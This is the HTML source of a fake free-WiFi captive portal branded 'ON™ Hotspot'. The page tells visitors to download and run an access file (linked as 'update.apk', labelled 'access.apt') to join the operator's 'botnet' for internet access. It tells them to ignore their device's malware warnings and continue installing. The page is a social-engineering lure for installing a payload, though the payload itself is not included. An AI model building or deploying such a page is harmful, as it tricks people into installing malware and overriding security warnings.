<!DOCTYPE html>
<html>

<head>
    <link rel="icon" href="static/images/favicon.ico">
    <title>ON™ Free Wifi</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <link href="static/css/bootstrap.min.css" rel="stylesheet">
    <link href="static/css/theme.css" rel="stylesheet">

    <!-- Add CSS for background color, text color, and left margin -->
    <style>
        body {
            background-color: darkgrey; /* Set background to dark grey */
            color: white;
            margin-left: 10px; /* Adjust the margin as needed */
        }

        /* Shift the container to the left */
        .container {
            margin-left: 10px; /* Adjust the margin as needed */
        }
    </style>

</head>

<body>

    <nav class="navbar navbar-inverse navbar-fixed-top">
        <div class="container">
            <div class="navbar-header">
                <a class="navbar-brand" href="">ON™ Hotspot </a>
            </div>
        </div>
    </nav>

    <div class="container theme-showcase" role="main">

        <div class="alert alert-warning" role="alert">
            <h4><strong>Notice:</strong> Orbiting Network™ owns a botnet, this botnet will give your device access to internet, you will need to install a '.apk' file to gain access to such botnet and use its network.
</h4>
<h5><strong>Warning:</strong>Because '.apt' isn't a commonly used file this file will be marked as malicious on your phone or pc! Please don't be alarmed and continue your installation
</h5></div>

        
            
                
                    <h4>
                        <form method="get" action="update.apk">
                            <button type="submit" class="btn btn-lg btn-success">Install 'access.apt'</button>
                        </form>
                    </h4>
                
            
        

        <br>

        <p>
            </p><ul class="list-unstyled">
                <ul>
                    <li><h4><strong>Step 1:</strong>Click "Install 'access.apt'" to download the botnet access file.</h4></li>
                    <li><h4><strong>Step 2:</strong> Run the '.apt' file to connect to our botnet's network.</h4></li>
                </ul>
            </ul>
        <p></p>
    </div>

    <br>

    <script src="static/js/jquery.js"></script>

    <script src="static/js/bootstrap.min.js"></script>



</body>
</html>
